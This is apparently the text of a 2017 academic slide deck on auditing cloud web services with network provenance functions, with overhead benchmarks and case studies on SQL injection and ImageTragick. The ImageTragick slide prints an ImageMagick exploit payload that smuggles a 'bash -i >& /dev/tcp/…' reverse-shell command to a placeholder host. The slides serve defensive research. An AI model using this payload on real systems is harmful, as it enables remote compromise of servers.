transparent web service auditing via network provenance...
TRANSCRIPT
Transparent Web Service Auditing via Network Provenance Functions
Adam Bates, Wajih Ul Hassan, Kevin Butler, Alin Dobra, Bradley Reaves, Patrick Cable, Thomas Moyer, Nabil Schear
This material is based upon work supported by the Assistant Secretary of Defense for Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the Assistant Secretary of Defense for Research and Engineering.
© 2017 Massachusetts Institute of Technology.
Delivered to the U.S. Government with Unlimited Rights, as defined in DFARS Part 252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed above. Use of this work other than as specifically authorized by the U.S. Government may violate any copyrights that exist in this work.
Presentation Name - 2 Author Initials MM/DD/YY
Motivation
• Typical cloud-based web application – Deployed in the cloud – Running services on different nodes – Complex interactions
• Attack occurs – How to track impact through application?
• Defenses often focus on network boundaries, not internal services
MySQL
SquidProxies
CassandraMongoDB
Amazon EC2Instances Web
servers
Amazon EC2Instances
user 1 user 2 user i...
Applicationservers
Elastic Load Balancer
Clo
ud c
ode
serv
ers
Pushservers
Redis
Presentation Name - 3 Author Initials MM/DD/YY
Data Provenance
• Data provenance is the history of ownership/processing to guide authenticity
• Data provenance helps to answer:
Activity used wasGeneratedBy
wasAssociatedWith
wasDerivedFrom
wasAttributedTo wasAttributedTo
Entity Entity
Agent
Processes Data
Users, groups, other systems, etc… World Wide Web
Consortium
– Where are all my data? – Where did they come from?
– Are the data secure and trustworthy? – How to recover after being attacked?
Presentation Name - 4 Author Initials MM/DD/YY
Goals
1. Complete System must offer a complete description of requests that flow through the web service
2. Integrated System must combine provenance from different software components into complete record
3. Widely Applicable Should not be limited to a particular application, backend component, or architecture
Presentation Name - 5 Author Initials MM/DD/YY
Threat Model
• Attacker assumptions – Launch network attacks against applications and
underlying infrastructure
• Goals – Command injection, e.g. SQL injection attacks against DB – Data exfiltration or injection – Gain foothold in system for further attacks, such as
lateral movement
• Trust assumptions – Applications are vulnerable to compromise – At least one record of adversary access attempt is
recorded before successful compromise
Presentation Name - 6 Author Initials MM/DD/YY
System Design
• Capturing provenance from system components
• Manual instrumentation – Add code to existing applications and
backend infrastructure
• Network Provenance Functions – Proxy connections between components – Parse protocols to capture provenance
• Components – Provenance monitor – Execution partitioning – Network provenance functions – Provenance recorder
Provenance RecorderServer Attack Graph
Query APITrash Collect
1
2
3
4
5
6
7
Provenance Flow Data Flow
Provenance Monitor
Database Server
Unmodified
Provenance Monitor
Web Server
ExecutionPartition
3
Provenance Monitor
Application Worker
Unmodified
Network Prov.Function
Proxy Server
Protocol Parser
Prov. Extractor
0
2
Presentation Name - 7 Author Initials MM/DD/YY
Protocol Parsers: SQL
• Need to determine what columns are accessed as part of a SQL query
function function
MAXCONCAT
NAME NAME NAME
“employees”“lastname”“firstname”“id” 1,000,000
select_expr NAME
NAME
select_stmt
select_expr_list from_stmt
select_expr
expr
where_stmt
expr
COMPARISON
NUMBER
“salary”
Explicit Data Access Implicit Data Access Ephemeral Data
WasMemberOf
WasMemberOfWasMemberOfWasMemberOf
Used
Used
UsedUsed_Implicit
Used_Ephemeral
employees
id
firstname
lastname
salary
1,000,000
select_stmt
SELECT employee_id, CONCAT (firstname, lastname) FROM employees WHERE MAX(salary) > 1,000,000
Presentation Name - 8 Author Initials MM/DD/YY
Protocol Parsers: Simple Object Access Protocol
• Simple Object Access Protocol (SOAP) enables remote procedure calls • Requires web services description language (WSDL) file to parse messages
– WSDL defines API for SOAP messages
Used Used Used
WasGeneratedBy
WasGeneratedBy
m:GetEndorsingBoarder
endorsingBoarder:Chris Englesmann
X.X.X.X
SOAP Request manufacturer:K2 model:FatBob
Presentation Name - 9 Author Initials MM/DD/YY
Implementation
• Provenance monitor – Linux Provenance Modules (LPM) with
Hi-Fi module enabled
• Execution partition – Modified Apache 2 web server – Added <5 lines of code
• Provenance recorder – C++ using SNAP graph library
• Network provenance function – Multithreaded TCP proxy in C – SQL parser using Bison
Provenance RecorderServer Attack Graph
Query APITrash Collect
1
2
3
4
5
6
7
Provenance Flow Data Flow
Provenance Monitor
Database Server
Unmodified
Provenance Monitor
Web Server
ExecutionPartition
3
Provenance Monitor
Application Worker
Unmodified
Network Prov.Function
Proxy Server
Protocol Parser
Prov. Extractor
0
2
Presentation Name - 10 Author Initials MM/DD/YY
Evaluation Overview
• Physical host – 2.4 GHz Intel Xeon processors (2x4-cores) – 12 GB RAM – VMware Fusion
• Virtual machines – CentOS 6.5 – 2 vCPUs – 4 GB RAM
• Measurements – End-to-end latency – Microbenchmarks – Case Studies
Presentation Name - 11 Author Initials MM/DD/YY
End-to-End Delay
• Need to ensure that NPFs don’t make system unusable
• Average overhead is ~11%, or at most 1ms per connection
BenchmarkTotal Database Average Time (ms) Percent
Queries Size (GB) w/o NPF with NPF Overhead
Dell DVD Store 6451 10 10.7 11.7 9.3
RUBiS 6430 1 6.5 7.2 11.2
WikiBench 6581 3 6.3 7.0 11.6
Presentation Name - 12 Author Initials MM/DD/YY
Microbenchmarks
• Capture performance – Parse query: 0.053ms on average – Transmit provenance: 0.318ms on average
• Query performance – 1.23ms on average – 7ms in the worst case – 0.5ms to build provenance graphs
0
0.1
0.2
0.3
0.4
0.5
0.6
0.7
0.8
0.9
1
0 0.1 0.2 0.3 0.4 0.5
Cum
ulat
ive
Dens
ity
Response Time (Milliseconds)
Unit StartUnit End
Parse QueryTransmit Prov 0
0.1
0.2
0.3
0.4
0.5
0.6
0.7
0.8
0.9
1
0 2 4 6 8 10
Cum
ulat
ive
Den
sity
Response Time (Milliseconds)
Presentation Name - 13 Author Initials MM/DD/YY
Case Study: SQL Injection Attack
• Web application vulnerable to SQL injection (SQLi) attack – Attackers often obfuscate queries to evade protections in applications
• Fully tracking path of attack needs to consider many aspects of the system – Network context, bypassed application logic, and database accesses
• Existing audit solutions ill-suited to this task • With NPF, admins create succinct policies about data crossing network boundaries
Used Used Used Used_Implicit
Used_Implicit Used
WasDerivedFrom WasDerivedFrom WasDerivedFrom WasDerivedFrom WasDerivedFrom
WasGeneratedBy
WasGeneratedBy
httpd worker 2021
X.X.X.X
name
customers
card_number card_expires
orders
id id
HTTP Response
HTTP Request
Presentation Name - 14 Author Initials MM/DD/YY
Case Study: ImageTragick
• ImageTragick: arbitrary code execution • Layer NPF with whole-system
provenance to track reverse shell through ImageTragick – Evaluation uses Linux Provenance
Modules to track files created on system, e.g. reverse-shell.php
• Attacker uploads file that created reverse shell on system
• ImageMagick runs identify on file, executing code to create reverse shell
WasGeneratedBy
Used
WasGeneratedBy
Used Used WasTriggeredBy
WasTriggeredBy
WasTriggeredBy
WasTriggeredBy
WasGeneratedBy
WasTriggeredBy
WasTriggeredBy
X.X.X.X
HTTP Request
httpd worker 4435
uploads/rsh.jpg
identify uploads/rsh.jpg
libMagickCore.so.2.0.0
sh -c curl -s -k -o /tmp/magic
bash -i /dev/tcp/X.X.X.X/9999
vi htdocs/reverse-shell.php
reverse-shell.php
curl -s -k -o /tmp/magick-XX8MNK2f http
sh -c identify uploads/rsh.jpg
push graphic-context viewbox 0 0 640 480 image over 0,0 0,0 'https://127.0.0.1/x.php?x=` bash -i >& /dev/tcp/aaa.bbb.ccc.ddd/9999 0>&1`’ pop graphic-context
Presentation Name - 15 Author Initials MM/DD/YY
Summary
• Web applications continue to exhibit vulnerabilities and a need for fine-grained auditing capabilities
• Network provenance functions provide application developers with mechanisms to monitor and protect sensitive web services – Minimally invasive – Low overhead – Widely applicable